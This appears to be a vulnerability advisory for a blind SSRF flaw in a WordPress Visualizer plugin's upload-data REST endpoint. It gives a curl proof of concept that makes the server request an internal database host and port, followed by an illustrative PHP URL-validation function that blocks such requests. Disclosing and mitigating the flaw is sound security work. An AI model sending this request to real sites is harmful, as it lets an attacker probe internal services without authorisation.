This plugin suffers from a blind SSRF vulnerability in the /wp-json/visualizer/v1/upload-data endpoint.
curl -i -s -X $'POST' \
-H $'Host: 192.168.158.128:8000' \
--data-binary $'{\"url\":\"http://db:3306\"}' \
$'http://192.168.158.128:8000/wp-json/visualizer/v1/upload-data'
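
A server-side check that would refuse the `url` value sent above, as an added example that is not the plugin's code or its actual fix. The function name, the injected resolver, and the resolver's addresses are hypothetical or constructed for illustration.

```php
<?php
// Added example, not the plugin's code. All names are hypothetical.

/**
 * Decide whether a user-supplied URL may be fetched server-side.
 * $resolver maps a hostname to a list of IP strings (injectable so the
 * check can be exercised offline; gethostbynamel() fits in production).
 */
function example_url_is_fetchable(string $url, callable $resolver): bool
{
    $parts = parse_url($url);
    if (!is_array($parts) || empty($parts['scheme']) || empty($parts['host'])) {
        return false;
    }
    $scheme = strtolower($parts['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        return false;                       // only web schemes
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return false;                       // no embedded credentials
    }
    $port = $parts['port'] ?? ($scheme === 'https' ? 443 : 80);
    if (!in_array($port, [80, 443], true)) {
        return false;                       // stops probing of ports such as 3306
    }
    $host = trim($parts['host'], '[]');     // parse_url keeps IPv6 brackets
    $ips  = filter_var($host, FILTER_VALIDATE_IP) ? [$host] : $resolver($host);
    if (empty($ips)) {
        return false;                       // unresolvable host
    }
    foreach ($ips as $ip) {
        // Reject private, loopback, link-local and other reserved ranges.
        $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
        if (filter_var($ip, FILTER_VALIDATE_IP, $flags) === false) {
            return false;
        }
    }
    return true;
}

// Constructed resolver data: "db" stands in for an internal service name.
$resolver = fn(string $h): array =>
    ['db' => ['172.18.0.2'], 'example.org' => ['93.184.216.34']][$h] ?? [];

var_dump(example_url_is_fetchable('http://db:3306', $resolver));           // internal host, non-web port
var_dump(example_url_is_fetchable('http://db/', $resolver));               // internal host, private address
var_dump(example_url_is_fetchable('http://169.254.169.254/', $resolver));  // link-local literal
var_dump(example_url_is_fetchable('https://example.org/data.csv', $resolver)); // public host
```

The fetch that follows should connect to the address that was validated and apply the same check to every redirect target, since a hostname can resolve differently between the check and the request.
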
See the references for more details.
Nathan Davison
No
2019-09-28 (about 3 years ago)
2019-09-28 (about 3 years ago)
2020-09-22 (about 2 years ago)